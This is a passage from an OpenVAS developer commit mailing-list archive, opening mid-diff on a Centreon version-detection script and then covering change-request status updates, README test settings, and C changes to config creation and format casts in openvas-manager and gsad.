[^0-9.]+([0-9.]+)[^<]+',icase:TRUE); + + if ( !isnull(version[1]) ) { + vers=chomp(version[1]); + set_kb_item(name: string("cpe:/a:centreon:centreon:",vers), value: TRUE); + } else { + set_kb_item(name: string("cpe:/a:centreon:centreon"), value: TRUE); + } + + set_kb_item(name: string("www/", port, "/centreon"), value: string(vers," under ",install)); + + info = string("None\n\nCentreon Version '"); + info += string(vers); + info += string("' was detected on the remote host in the following directory(s):\n\n"); + info += string(install, "\n"); + + desc = ereg_replace( + string:desc, + pattern:"None$", + replace:info + ); + + if(report_verbosity > 0) { + security_note(port:port,data:desc); + } + exit(0); + + } +} +exit(0); + Property changes on: trunk/openvas-plugins/scripts/centreon_detect.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision From scm-commit at wald.intevation.org Wed Jan 6 10:45:21 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 6 Jan 2010 10:45:21 +0100 (CET) Subject: [Openvas-commits] r6320 - trunk/doc/website Message-ID: <20100106094521.BFE2C86607C6@pyrosoma.intevation.org> Author: felix Date: 2010-01-06 10:45:17 +0100 (Wed, 06 Jan 2010) New Revision: 6320 Modified: trunk/doc/website/openvas-client.htm4 trunk/doc/website/openvas-cr-13.htm4 trunk/doc/website/openvas-cr-15.htm4 trunk/doc/website/openvas-cr-18.htm4 trunk/doc/website/openvas-cr-20.htm4 trunk/doc/website/openvas-cr-25.htm4 trunk/doc/website/openvas-cr-27.htm4 trunk/doc/website/openvas-cr-32.htm4 trunk/doc/website/openvas-cr-33.htm4 trunk/doc/website/openvas-cr-37.htm4 trunk/doc/website/openvas-crs.htm4 Log: Updated Change Requests (many done). Modified: trunk/doc/website/openvas-client.htm4 =================================================================== --- trunk/doc/website/openvas-client.htm4 2010-01-06 09:44:19 UTC (rev 6319) +++ trunk/doc/website/openvas-client.htm4 2010-01-06 09:45:17 UTC (rev 6320) @@ -171,7 +171,7 @@

-Note: If you know of further sources for backports, let the OpenVAS team know and they will be added to this list. +Note: If you know of further sources for backports, let the OpenVAS team know and they will be added to this list. Modified: trunk/doc/website/openvas-cr-13.htm4 =================================================================== --- trunk/doc/website/openvas-cr-13.htm4 2010-01-06 09:44:19 UTC (rev 6319) +++ trunk/doc/website/openvas-cr-13.htm4 2010-01-06 09:45:17 UTC (rev 6320) @@ -28,7 +28,7 @@ PAGE_START

OpenVAS Change Request #13: Integrating the OVAL interpreter ovaldi into OpenVAS Server

-Status: Voted +4. A proof-of-concept has been implemented and is included in OpenVAS since 2.0-beta1. +Status: Voted +4. Done. A proof-of-concept has been implemented and is included in OpenVAS since 2.0-beta1.

Purpose

@@ -300,6 +300,8 @@

History

    +
  • 2010-01-06 Felix Wolfsteller <felix.wolfsteller at intevation.de>:
    + Updated status as done.
  • 2008-12-09 Michael Wiegand <michael.wiegand at intevation.de>:
    Updated status and implementation details.
  • 2008-07-10 Jan-Oliver Wagner <jan-oliver.wagner at intevation.de>:
    Modified: trunk/doc/website/openvas-cr-15.htm4 =================================================================== --- trunk/doc/website/openvas-cr-15.htm4 2010-01-06 09:44:19 UTC (rev 6319) +++ trunk/doc/website/openvas-cr-15.htm4 2010-01-06 09:45:17 UTC (rev 6320) @@ -28,7 +28,7 @@ PAGE_START

    OpenVAS Change Request #15: OpenVAS Server: Remove features for detached scans

    -Status: Voted +4. Implemented with SVN 1118 in openvas-server 1.1 series. Needs testing. +Status: Voted +4. Done. Implemented with SVN revision 1118.

    Purpose

    @@ -124,6 +124,8 @@

    History

      +
    • 2010-01-06 Felix Wolfsteller <felix.wolfsteller at intevation.de>:
      + Updated status as done.
    • 2008-08-08 Jan-Oliver Wagner <jan-oliver.wagner at intevation.de>:
      Updated status: implemented.
      Updated description: Mentioning continous scans and reducing the list of Modified: trunk/doc/website/openvas-cr-18.htm4 =================================================================== --- trunk/doc/website/openvas-cr-18.htm4 2010-01-06 09:44:19 UTC (rev 6319) +++ trunk/doc/website/openvas-cr-18.htm4 2010-01-06 09:45:17 UTC (rev 6320) @@ -28,7 +28,7 @@ PAGE_START

      OpenVAS Change Request #18: OpenVAS-Client: Improve Handling of False-Positives

      -Status: Voted +3. In progress. +Status: Voted +3. Done. Functionality described here superseded by "severity override" features, released with openvas-client 2.0.3.

      Purpose

      @@ -105,16 +105,13 @@ modification of nessus/prefs_dialog/prefs_scope_tree.c.
      • -
    • - Develop a graphical interface for the user to alter the priority of - a test individually on a per-host basis. -
      • -

    History

      +
    • 2010-01-06 Felix Wolfsteller <felix.wolfsteller at intevation.de>:
      + Updated status as done.
    • 2008-11-13 Joey Schulze <joey at infodrom.org>:
      Initial text.
    • 2008-11-16 Jan-Oliver Wagner <jan-oliver.wagner at intevation.de>:
      Modified: trunk/doc/website/openvas-cr-20.htm4 =================================================================== --- trunk/doc/website/openvas-cr-20.htm4 2010-01-06 09:44:19 UTC (rev 6319) +++ trunk/doc/website/openvas-cr-20.htm4 2010-01-06 09:45:17 UTC (rev 6320) @@ -28,7 +28,7 @@ PAGE_START

      OpenVAS Change Request #20: OpenVAS: Improve SSH Credentials Management

      -Status: Voted +4, implemented in SVN trunk, revision 2408. +Status: Voted +4. Done, implemented in SVN trunk, revision 2408.

      Purpose

      @@ -326,6 +326,8 @@

      History

        +
      • 2010-01-06 Felix Wolfsteller <felix.wolfsteller at intevation.de>:
        + Updated status as done.
      • 2009-02-06 Felix Wolfsteller <felix.wolfsteller at intevation.de>:
        Added TBDs
      • 2009-02-06 Felix Wolfsteller <felix.wolfsteller at intevation.de>:
        Modified: trunk/doc/website/openvas-cr-25.htm4 =================================================================== --- trunk/doc/website/openvas-cr-25.htm4 2010-01-06 09:44:19 UTC (rev 6319) +++ trunk/doc/website/openvas-cr-25.htm4 2010-01-06 09:45:17 UTC (rev 6320) @@ -29,7 +29,7 @@

        OpenVAS Change Request #25: OpenVAS-libnasl: Introducing support for WMI

        -Status: Voted #4. In progress. +Status: Voted #4. Done, released with openvas-libraries 3.0.0.

        Purpose

        @@ -316,4 +316,6 @@ Updated with voting results (vote was in early february) and set status to "in progress".
        • +
      • 2010-01-06 Felix Wolfsteller <felix.wolfsteller at intevation.de>:
        + Updated status as done.
      Modified: trunk/doc/website/openvas-cr-27.htm4 =================================================================== --- trunk/doc/website/openvas-cr-27.htm4 2010-01-06 09:44:19 UTC (rev 6319) +++ trunk/doc/website/openvas-cr-27.htm4 2010-01-06 09:45:17 UTC (rev 6320) @@ -26,8 +26,7 @@

      OpenVAS Change Request #27: IPv6 support

      -Status: Implementation. -Votes: +10, in progress +Votes: +10. Done. Released with openvas-libraries and openvas-scanner 3.0.0.

      Purpose

      @@ -182,4 +181,6 @@ Updated module level details.
    • 2009-01-13 Chandrashekhar B <bchandra at secpod.com>:
      Updated openvas-client modules
      • +
    • 2010-01-06 Felix Wolfsteller <felix.wolfsteller at intevation.de>:
      + Updated status as done.
    Modified: trunk/doc/website/openvas-cr-32.htm4 =================================================================== --- trunk/doc/website/openvas-cr-32.htm4 2010-01-06 09:44:19 UTC (rev 6319) +++ trunk/doc/website/openvas-cr-32.htm4 2010-01-06 09:45:17 UTC (rev 6320) @@ -29,7 +29,7 @@

    OpenVAS Change Request #32: Discontinuing the tarball releases of openvas-plugins

    -Status: Voted +10. In progress. +Status: Voted +10. Done. No openvas-plugins release with openvas 3.0.0.

    Purpose

    @@ -173,6 +173,8 @@

    History

      +
    • 2010-01-06 Felix Wolfsteller <felix.wolfsteller at intevation.de>:
      + Updated status as done.
    • 2009-05-20 Michael Wiegand <michael.wiegand at intevation.de>:
      Updated status with voting results.
    • 2009-05-19 Geoff Galitz <geoff at galitz.org>:
      Modified: trunk/doc/website/openvas-cr-33.htm4 =================================================================== --- trunk/doc/website/openvas-cr-33.htm4 2010-01-06 09:44:19 UTC (rev 6319) +++ trunk/doc/website/openvas-cr-33.htm4 2010-01-06 09:45:17 UTC (rev 6320) @@ -29,7 +29,7 @@

      OpenVAS Change Request #33: Change server-side NVT cache from binary dumps to keyfiles

      -Status: Voted +9. In progress. +Status: Voted +9. Done. Released with openvas-scanner 3.0.0.

      Purpose

      @@ -121,6 +121,8 @@

      History

        +
      • 2010-01-06 Felix Wolfsteller <felix.wolfsteller at intevation.de>:
        + Updated status as done.
      • 2009-06-12 Jan-Oliver Wagner <jan-oliver.wagner at greenbone.net>:
        Added voting results.
      • 2009-06-05 Jan-Oliver Wagner <jan-oliver.wagner at greenbone.net>:
        Modified: trunk/doc/website/openvas-cr-37.htm4 =================================================================== --- trunk/doc/website/openvas-cr-37.htm4 2010-01-06 09:44:19 UTC (rev 6319) +++ trunk/doc/website/openvas-cr-37.htm4 2010-01-06 09:45:17 UTC (rev 6320) @@ -29,7 +29,7 @@ PAGE_START

        OpenVAS Change Request #37: Make openvas-client depend on openvas-libraries

        -Status: Voted +6. In progess. +Status: Voted +6. Done. Released with openvas-client and openvas-libraries 3.0.0.

        Purpose

        @@ -123,6 +123,8 @@

        History

          +
        • 2010-01-06 Felix Wolfsteller <felix.wolfsteller at intevation.de>:
          + Updated status as done.
        • 2009-07-12 Felix Wolfsteller <felix.wolfsteller at intevation.de>:
          Corrected typos found by Jan-Oliver Wagner and Matthew Mundell.
        • 2009-07-02 Felix Wolfsteller <felix.wolfsteller at intevation.de> and Jan-Oliver Wagner <jan-oliver.wagner at intevation.de>:
          Modified: trunk/doc/website/openvas-crs.htm4 =================================================================== --- trunk/doc/website/openvas-crs.htm4 2010-01-06 09:44:19 UTC (rev 6319) +++ trunk/doc/website/openvas-crs.htm4 2010-01-06 09:45:17 UTC (rev 6320) @@ -56,31 +56,31 @@
        • OpenVAS Change Request #10: Remove support for non-SSL connections in OpenVAS-Client (done)
        • OpenVAS Change Request #11: Make OpenVAS-Client use (and depend on) glib (done)
        • OpenVAS Change Request #12: Replace NTP with OTP (done) -
        • OpenVAS Change Request #13: Integrating the OVAL interpreter ovaldi into OpenVAS Server (in progress) +
        • OpenVAS Change Request #13: Integrating the OVAL interpreter ovaldi into OpenVAS Server (done)
        • OpenVAS Change Request #14: OpenVAS-Client: Remove source code copy of gdchart and gd (done) -
        • OpenVAS Change Request #15: OpenVAS Server: Remove features for detached scans (in progress) +
        • OpenVAS Change Request #15: OpenVAS Server: Remove features for detached scans (done)
        • OpenVAS Change Request #16: OpenVAS-Client: Do not automatically enable new NVTs (done)
        • OpenVAS Change Request #17: OTP: Make NVT signatures available to OpenVAS-Client (done) -
        • OpenVAS Change Request #18: OpenVAS-Client: Improve Handling of False-Positives (in progress) +
        • OpenVAS Change Request #18: OpenVAS-Client: Improve Handling of False-Positives (done)
        • OpenVAS Change Request #19: Agree on a style guideline and on a format for the documentation (done)
        • OpenVAS Change Request #20: OpenVAS: Improve SSH Credentials Management (in progress)
        • OpenVAS Change Request #21: OpenVAS-Client: Improve Vulnerability Summary Listing (in discussion)
        • OpenVAS Change Request #22: OpenVAS-libnasl: Introduce new script_tag Command (done)
        • OpenVAS Change Request #23: OpenVAS-libnasl: Standardize Script Families for NVT (in discussion)
        • OpenVAS Change Request #24: OpenVAS-Server: Reorganize NVTs in Subdirectories (in progress) -
        • OpenVAS Change Request #25: OpenVAS-libnasl: Introducing support for WMI (in progress) +
        • OpenVAS Change Request #25: OpenVAS-libnasl: Introducing support for WMI (done)
        • OpenVAS Change Request #26: OpenVAS-libnasl: Introduction of more phases in NASL (in discussion) -
        • OpenVAS Change Request #27: IPv6 support (in progress) +
        • OpenVAS Change Request #27: IPv6 support (done)
        • OpenVAS Change Request #28: OpenVAS Management Protocol (OMP) (in discussion)
        • OpenVAS Change Request #29: OpenVAS Unified Logging (in progress)
        • OpenVAS Change Request #30: OpenVAS Configuration Management Protocol (OCP) (in discussion)
        • OpenVAS Change Request #31: OpenVAS-Server: Remove support for plaintext password storage (in progress) -
        • OpenVAS Change Request #32: Discontinuing the tarball releases of openvas-plugins (in progress) -
        • OpenVAS Change Request #33: Change server-side NVT cache from binary dumps to keyfiles (in progress) +
        • OpenVAS Change Request #32: Discontinuing the tarball releases of openvas-plugins (done) +
        • OpenVAS Change Request #33: Change server-side NVT cache from binary dumps to keyfiles (done)
        • OpenVAS Change Request #34: Upgrade OpenVAS Server dependency from glib 2.6 to glib 2.8 (done)
        • OpenVAS Change Request #35: OpenVAS-Client: Migrate from OpenSSL to GNU/TLS (done)
        • OpenVAS Change Request #36: NASL: Remove current i18n concept (in progress) -
        • OpenVAS Change Request #37: Make openvas-client depend on openvas-libraries (in progress) +
        • OpenVAS Change Request #37: Make openvas-client depend on openvas-libraries (done)
        • OpenVAS Change Request #38: Reorganize OpenVAS libraries (done)
        • OpenVAS Change Request #39: Mandatory KB keys (done)
        • OpenVAS Change Request #40: find_service.c and NMAP service detection (done) From scm-commit at wald.intevation.org Wed Jan 6 10:46:28 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 6 Jan 2010 10:46:28 +0100 (CET) Subject: [Openvas-commits] r6321 - trunk/openvas-manager Message-ID: <20100106094628.9C47986607C3@pyrosoma.intevation.org> Author: mattm Date: 2010-01-06 10:46:27 +0100 (Wed, 06 Jan 2010) New Revision: 6321 Modified: trunk/openvas-manager/ChangeLog trunk/openvas-manager/README Log: * README: Note OPENVAS_TEST_HOST and OPENVAS_TEST_PORT. Modified: trunk/openvas-manager/ChangeLog =================================================================== --- trunk/openvas-manager/ChangeLog 2010-01-06 09:45:17 UTC (rev 6320) +++ trunk/openvas-manager/ChangeLog 2010-01-06 09:46:27 UTC (rev 6321) @@ -1,9 +1,13 @@ -2009-01-06 Felix Wolfsteller +2010-01-06 Matthew Mundell + * README: Note OPENVAS_TEST_HOST and OPENVAS_TEST_PORT. + +2010-01-06 Felix Wolfsteller + * CMakeLists.txt: Added clumsy for check for libopenvas version from gsad. -2009-01-05 Matthew Mundell +2010-01-05 Matthew Mundell Convert the GET_CONFIGS "nvt_selector" attribute to an "export" attribute. Add importing of entire configs to CREATE_CONFIG. @@ -39,7 +43,7 @@ host overview table by shortening text that is displayed when page breaks within the table occur. -2009-01-04 Matthew Mundell +2010-01-04 Matthew Mundell Add an option to OMP command GET_CONFIGS for getting the NVT selectors of the configs. Modified: trunk/openvas-manager/README =================================================================== --- trunk/openvas-manager/README 2010-01-06 09:45:17 UTC (rev 6320) +++ trunk/openvas-manager/README 2010-01-06 09:46:27 UTC (rev 6321) @@ -59,6 +59,11 @@ export OPENVAS_TEST_USER=user_created_by_openvas-adduser export OPENVAS_TEST_PASSWORD=that_users_password +and optionally for the host and/or port + + export OPENVAS_TEST_HOST=host.example.org + export OPENVAS_TEST_PORT=9999 + and then run all the tests make test From scm-commit at wald.intevation.org Wed Jan 6 11:21:38 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 6 Jan 2010 11:21:38 +0100 (CET) Subject: [Openvas-commits] r6322 - trunk/doc/website Message-ID: <20100106102138.656CE86607C6@pyrosoma.intevation.org> Author: felix Date: 2010-01-06 11:21:37 +0100 (Wed, 06 Jan 2010) New Revision: 6322 Modified: trunk/doc/website/openvas-cr-31.htm4 trunk/doc/website/openvas-cr-36.htm4 trunk/doc/website/openvas-crs.htm4 Log: Marked some Change Requests as done Modified: trunk/doc/website/openvas-cr-31.htm4 =================================================================== --- trunk/doc/website/openvas-cr-31.htm4 2010-01-06 09:46:27 UTC (rev 6321) +++ trunk/doc/website/openvas-cr-31.htm4 2010-01-06 10:21:37 UTC (rev 6322) @@ -29,7 +29,7 @@

          OpenVAS Change Request #31: OpenVAS-Server: Remove support for plaintext password storage

          -Status: Voted +7. In progress. First part implemented in SVN revision 3317. +Status: Voted +7. In progress. Done. Implementation started with SVN revision 3317.

          Purpose

          @@ -138,6 +138,8 @@

          History

            +
          • 2010-01-06 Felix Wolfsteller <felix.wolfsteller at intevation.de>:
            + Updated status as done.
          • 2009-05-11 Michael Wiegand <michael.wiegand at intevation.de>:
            Updated status.
          • 2009-05-04 Michael Wiegand <michael.wiegand at intevation.de>:
            Modified: trunk/doc/website/openvas-cr-36.htm4 =================================================================== --- trunk/doc/website/openvas-cr-36.htm4 2010-01-06 09:46:27 UTC (rev 6321) +++ trunk/doc/website/openvas-cr-36.htm4 2010-01-06 10:21:37 UTC (rev 6322) @@ -29,7 +29,7 @@

            OpenVAS Change Request #36: NASL: Remove current i18n concept

            -Status: Voted +7. In progress. +Status: Voted +7. Done.

            Purpose

            @@ -124,6 +124,8 @@

            History

              +
            • 2010-01-06 Felix Wolfsteller <felix.wolfsteller at intevation.de>:
              + Updated status as done.
            • 2009-07-27 Felix Wolfsteller <felix.wolfsteller at intevation.de>:
              Updated reference to script, minor typo fixes.
            • 2009-06-26 Michael Wiegand <michael.wiegand at greenbone.net>:
              Modified: trunk/doc/website/openvas-crs.htm4 =================================================================== --- trunk/doc/website/openvas-crs.htm4 2010-01-06 09:46:27 UTC (rev 6321) +++ trunk/doc/website/openvas-crs.htm4 2010-01-06 10:21:37 UTC (rev 6322) @@ -63,7 +63,7 @@
            • OpenVAS Change Request #17: OTP: Make NVT signatures available to OpenVAS-Client (done)
            • OpenVAS Change Request #18: OpenVAS-Client: Improve Handling of False-Positives (done)
            • OpenVAS Change Request #19: Agree on a style guideline and on a format for the documentation (done) -
            • OpenVAS Change Request #20: OpenVAS: Improve SSH Credentials Management (in progress) +
            • OpenVAS Change Request #20: OpenVAS: Improve SSH Credentials Management (done)
            • OpenVAS Change Request #21: OpenVAS-Client: Improve Vulnerability Summary Listing (in discussion)
            • OpenVAS Change Request #22: OpenVAS-libnasl: Introduce new script_tag Command (done)
            • OpenVAS Change Request #23: OpenVAS-libnasl: Standardize Script Families for NVT (in discussion) @@ -74,12 +74,12 @@
            • OpenVAS Change Request #28: OpenVAS Management Protocol (OMP) (in discussion)
            • OpenVAS Change Request #29: OpenVAS Unified Logging (in progress)
            • OpenVAS Change Request #30: OpenVAS Configuration Management Protocol (OCP) (in discussion) -
            • OpenVAS Change Request #31: OpenVAS-Server: Remove support for plaintext password storage (in progress) +
            • OpenVAS Change Request #31: OpenVAS-Server: Remove support for plaintext password storage (done)
            • OpenVAS Change Request #32: Discontinuing the tarball releases of openvas-plugins (done)
            • OpenVAS Change Request #33: Change server-side NVT cache from binary dumps to keyfiles (done)
            • OpenVAS Change Request #34: Upgrade OpenVAS Server dependency from glib 2.6 to glib 2.8 (done)
            • OpenVAS Change Request #35: OpenVAS-Client: Migrate from OpenSSL to GNU/TLS (done) -
            • OpenVAS Change Request #36: NASL: Remove current i18n concept (in progress) +
            • OpenVAS Change Request #36: NASL: Remove current i18n concept (done)
            • OpenVAS Change Request #37: Make openvas-client depend on openvas-libraries (done)
            • OpenVAS Change Request #38: Reorganize OpenVAS libraries (done)
            • OpenVAS Change Request #39: Mandatory KB keys (done) From scm-commit at wald.intevation.org Wed Jan 6 11:58:28 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 6 Jan 2010 11:58:28 +0100 (CET) Subject: [Openvas-commits] r6323 - in trunk/openvas-manager: . src Message-ID: <20100106105828.2961E86607C3@pyrosoma.intevation.org> Author: mattm Date: 2010-01-06 11:58:25 +0100 (Wed, 06 Jan 2010) New Revision: 6323 Modified: trunk/openvas-manager/ChangeLog trunk/openvas-manager/src/manage.h trunk/openvas-manager/src/omp.c trunk/openvas-manager/src/tasks_sql.h Log: * src/tasks_sql.h (create_config): Add name return arg. Find a unique name if a config with the same name exists already. * src/manage.h: Update header accordingly. * src/omp.c (omp_xml_handle_end_element): Include config name in CREATE_CONFIG import response. Modified: trunk/openvas-manager/ChangeLog =================================================================== --- trunk/openvas-manager/ChangeLog 2010-01-06 10:21:37 UTC (rev 6322) +++ trunk/openvas-manager/ChangeLog 2010-01-06 10:58:25 UTC (rev 6323) @@ -1,5 +1,15 @@ 2010-01-06 Matthew Mundell + * src/tasks_sql.h (create_config): Add name return arg. Find a unique + name if a config with the same name exists already. + + * src/manage.h: Update header accordingly. + + * src/omp.c (omp_xml_handle_end_element): Include config name in + CREATE_CONFIG import response. + +2010-01-06 Matthew Mundell + * README: Note OPENVAS_TEST_HOST and OPENVAS_TEST_PORT. 2010-01-06 Felix Wolfsteller Modified: trunk/openvas-manager/src/manage.h =================================================================== --- trunk/openvas-manager/src/manage.h 2010-01-06 10:21:37 UTC (rev 6322) +++ trunk/openvas-manager/src/manage.h 2010-01-06 10:58:25 UTC (rev 6323) @@ -732,7 +732,8 @@ } nvt_selector_t; int -create_config (const char*, const char*, const array_t*, const array_t*); +create_config (const char*, const char*, const array_t*, const array_t*, + char**); int create_config_rc (const char*, const char*, char*); Modified: trunk/openvas-manager/src/omp.c =================================================================== --- trunk/openvas-manager/src/omp.c 2010-01-06 10:21:37 UTC (rev 6322) +++ trunk/openvas-manager/src/omp.c 2010-01-06 10:58:25 UTC (rev 6323) @@ -6071,15 +6071,24 @@ * any other elements. */ if (import_config_data->import) { + char *name; array_terminate (import_config_data->nvt_selectors); array_terminate (import_config_data->preferences); switch (create_config (import_config_data->name, import_config_data->comment, import_config_data->nvt_selectors, - import_config_data->preferences)) + import_config_data->preferences, + &name)) { case 0: - SEND_TO_CLIENT_OR_FAIL (XML_OK_CREATED ("create_config")); + SENDF_TO_CLIENT_OR_FAIL + ("" + "%s" + "", + name); + free (name); break; case 1: SEND_TO_CLIENT_OR_FAIL Modified: trunk/openvas-manager/src/tasks_sql.h =================================================================== --- trunk/openvas-manager/src/tasks_sql.h 2010-01-06 10:21:37 UTC (rev 6322) +++ trunk/openvas-manager/src/tasks_sql.h 2010-01-06 10:58:25 UTC (rev 6323) @@ -6177,71 +6177,74 @@ /** * @brief Create a config. * - * @param[in] name Name of config and NVT selector. - * @param[in] comment Comment on config. - * @param[in] selectors NVT selectors. - * @param[in] preferences Preferences. + * If a config with the same name exists already then add a unique integer + * suffix onto the name. * + * @param[in] proposed_name Proposed name of config and NVT selector. + * @param[in] comment Comment on config. + * @param[in] selectors NVT selectors. + * @param[in] preferences Preferences. + * @param[out] name On success the name of the config. + * * @return 0 success, 1 config exists already, -1 error, -2 name empty, * -3 input error in selectors, -4 input error in preferences. */ int -create_config (const char* name, const char* comment, +create_config (const char* proposed_name, const char* comment, const array_t* selectors /* nvt_selector_t. */, - const array_t* preferences /* preference_t. */) + const array_t* preferences /* preference_t. */, + char **name) { int ret; - gchar* quoted_name; - gchar* quoted_comment; + gchar *quoted_comment, *candidate_name, *quoted_candidate_name; config_t config; + unsigned int num = 1; - if (name == NULL || strlen (name) == 0) return -2; + if (proposed_name == NULL || strlen (proposed_name) == 0) return -2; - quoted_name = sql_quote (name); + candidate_name = g_strdup (proposed_name); + quoted_candidate_name = sql_quote (candidate_name); sql ("BEGIN IMMEDIATE;"); - if (sql_int (0, 0, - "SELECT COUNT(*) FROM configs WHERE name = '%s';", - quoted_name)) + while (1) { - tracef (" config \"%s\" already exists\n", name); - sql ("ROLLBACK;"); - g_free (quoted_name); - return 1; + if ((sql_int (0, 0, + "SELECT COUNT(*) FROM configs WHERE name = '%s';", + quoted_candidate_name) + == 0) + /** @todo Reference selector in config by ROWID instead of by name. */ + && (sql_int (0, 0, + "SELECT COUNT(*) FROM nvt_selectors WHERE name = '%s' LIMIT 1;", + quoted_candidate_name) + == 0)) + break; + g_free (candidate_name); + g_free (quoted_candidate_name); + candidate_name = g_strdup_printf ("%s %u", proposed_name, ++num); + quoted_candidate_name = sql_quote (candidate_name); } - /** @todo Reference selector in config by ROWID instead of by name. */ - if (sql_int (0, 0, - "SELECT COUNT(*) FROM nvt_selectors WHERE name = '%s' LIMIT 1;", - quoted_name)) - { - tracef (" NVT selector \"%s\" already exists\n", name); - sql ("ROLLBACK;"); - g_free (quoted_name); - return -1; - } - if (comment) { quoted_comment = sql_nquote (comment, strlen (comment)); sql ("INSERT INTO configs (name, nvt_selector, comment)" " VALUES ('%s', '%s', '%s');", - quoted_name, quoted_name, quoted_comment); + quoted_candidate_name, quoted_candidate_name, quoted_comment); g_free (quoted_comment); } else sql ("INSERT INTO configs (name, nvt_selector, comment)" " VALUES ('%s', '%s', '');", - quoted_name, quoted_name); + quoted_candidate_name, quoted_candidate_name); /* Insert the selectors into the nvt_selectors table. */ config = sqlite3_last_insert_rowid (task_db); - if ((ret = insert_nvt_selectors (quoted_name, selectors))) + if ((ret = insert_nvt_selectors (quoted_candidate_name, selectors))) { sql ("ROLLBACK;"); - g_free (quoted_name); + g_free (quoted_candidate_name); return ret; } @@ -6250,16 +6253,17 @@ if ((ret = config_insert_preferences (config, preferences))) { sql ("ROLLBACK;"); - g_free (quoted_name); + g_free (quoted_candidate_name); return ret; } /* Update family and NVT count caches. */ - update_config_caches (name); + update_config_caches (candidate_name); sql ("COMMIT;"); - g_free (quoted_name); + g_free (quoted_candidate_name); + *name = candidate_name; return 0; } From scm-commit at wald.intevation.org Wed Jan 6 12:02:29 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 6 Jan 2010 12:02:29 +0100 (CET) Subject: [Openvas-commits] r6324 - in trunk/gsa: . src/html/src Message-ID: <20100106110229.A658486607AF@pyrosoma.intevation.org> Author: mattm Date: 2010-01-06 12:02:29 +0100 (Wed, 06 Jan 2010) New Revision: 6324 Modified: trunk/gsa/ChangeLog trunk/gsa/src/html/src/omp.xsl Log: * src/html/src/omp.xsl (create_config_response): Pass config name in result details. Modified: trunk/gsa/ChangeLog =================================================================== --- trunk/gsa/ChangeLog 2010-01-06 10:58:25 UTC (rev 6323) +++ trunk/gsa/ChangeLog 2010-01-06 11:02:29 UTC (rev 6324) @@ -1,3 +1,8 @@ +2010-01-06 Matthew Mundell + + * src/html/src/omp.xsl (create_config_response): Pass config name in + result details. + 2010-01-06 Felix Wolfsteller * src/html/src/omp.xsl: Fixed TODO: pre-select the chosen refresh Modified: trunk/gsa/src/html/src/omp.xsl =================================================================== --- trunk/gsa/src/html/src/omp.xsl 2010-01-06 10:58:25 UTC (rev 6323) +++ trunk/gsa/src/html/src/omp.xsl 2010-01-06 11:02:29 UTC (rev 6324) @@ -3639,6 +3639,9 @@ + + Name of new config is ''. + From scm-commit at wald.intevation.org Wed Jan 6 12:09:45 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 6 Jan 2010 12:09:45 +0100 (CET) Subject: [Openvas-commits] r6325 - in trunk/gsa: . src Message-ID: <20100106110945.E100686607CB@pyrosoma.intevation.org> Author: felix Date: 2010-01-06 12:09:45 +0100 (Wed, 06 Jan 2010) New Revision: 6325 Modified: trunk/gsa/ChangeLog trunk/gsa/src/gsad.c Log: Resolved compile issues on 64bit systems. * src/gsad.c (serve_post): Cast size_t to int (.* format expects integer). Modified: trunk/gsa/ChangeLog =================================================================== --- trunk/gsa/ChangeLog 2010-01-06 11:02:29 UTC (rev 6324) +++ trunk/gsa/ChangeLog 2010-01-06 11:09:45 UTC (rev 6325) @@ -1,3 +1,10 @@ +2010-01-06 Felix Wolfsteller + + Resolved compile issues on 64bit systems. + + * src/gsad.c (serve_post): Cast size_t to int (.* format expects + integer). + 2010-01-06 Matthew Mundell * src/html/src/omp.xsl (create_config_response): Pass config name in Modified: trunk/gsa/src/gsad.c =================================================================== --- trunk/gsa/src/gsad.c 2010-01-06 11:02:29 UTC (rev 6324) +++ trunk/gsa/src/gsad.c 2010-01-06 11:09:45 UTC (rev 6325) @@ -1022,7 +1022,7 @@ condition_data = g_strdup_printf ("%s0%.*s", key + strlen ("condition_data:"), - size, + (int) size, data); condition_data[strlen (key + strlen ("condition_data:"))] = '\0'; @@ -1043,7 +1043,7 @@ event_data = g_strdup_printf ("%s0%.*s", key + strlen ("event_data:"), - size, + (int) size, data); event_data[strlen (key + strlen ("event_data:"))] = '\0'; @@ -1064,7 +1064,7 @@ method_data = g_strdup_printf ("%s0%.*s", key + strlen ("method_data:"), - size, + (int) size, data); method_data[strlen (key + strlen ("method_data:"))] = '\0'; From scm-commit at wald.intevation.org Wed Jan 6 12:53:44 2010 From: scm-commit at wald.intevation.org (scm-commit@wald.intevation.org) Date: Wed, 6 Jan 2010 12:53:44 +0100 (CET) Subject: [Openvas-commits] r6326 - trunk/doc/website Message-ID: <20100106115344.676F986607AF@pyrosoma.intevation.org> Author: felix Date: 2010-01-06 12:53:38 +0100 (Wed, 06 Jan 2010) New Revision: 6326 Modified: trunk/doc/website/openvas-cr-23.htm4 trunk/doc/website/openvas-crs.htm4 Log: Marked CR#23 (standardization of family names) as done Modified: trunk/doc/website/openvas-cr-23.htm4 =================================================================== --- trunk/doc/website/openvas-cr-23.htm4 2010-01-06 11:09:45 UTC (rev 6325) +++ trunk/doc/website/openvas-cr-23.htm4 2010-01-06 11:53:38 UTC (rev 6326) @@ -29,8 +29,7 @@

              OpenVAS Change Request #23: OpenVAS-libnasl: Standardize Script Families for NVT

              -Status: In discusssion. -Votes: +7, in progress +Votes: +7. Done.

              Purpose

              @@ -413,4 +412,8 @@ 2009-12-10 Michael Wiegand <michael.wiegand at intevation.de>:
              - Removed 'GSHB' family, added 'Compliance' family
              • +
            • + 2010-01-06 Felix Wolfsteller <felix.wolfsteller at intevation.de>:
              + - Updated status as done. +
            Modified: trunk/doc/website/openvas-crs.htm4 =================================================================== --- trunk/doc/website/openvas-crs.htm4 2010-01-06 11:09:45 UTC (rev 6325) +++ trunk/doc/website/openvas-crs.htm4 2010-01-06 11:53:38 UTC (rev 6326) @@ -66,7 +66,7 @@
          • OpenVAS Change Request #20: OpenVAS: Improve SSH Credentials Management (done)
          • OpenVAS Change Request #21: OpenVAS-Client: Improve Vulnerability Summary Listing (in discussion)
          • OpenVAS Change Request #22: OpenVAS-libnasl: Introduce new script_tag Command (done) -
          • OpenVAS Change Request #23: OpenVAS-libnasl: Standardize Script Families for NVT (in discussion) +
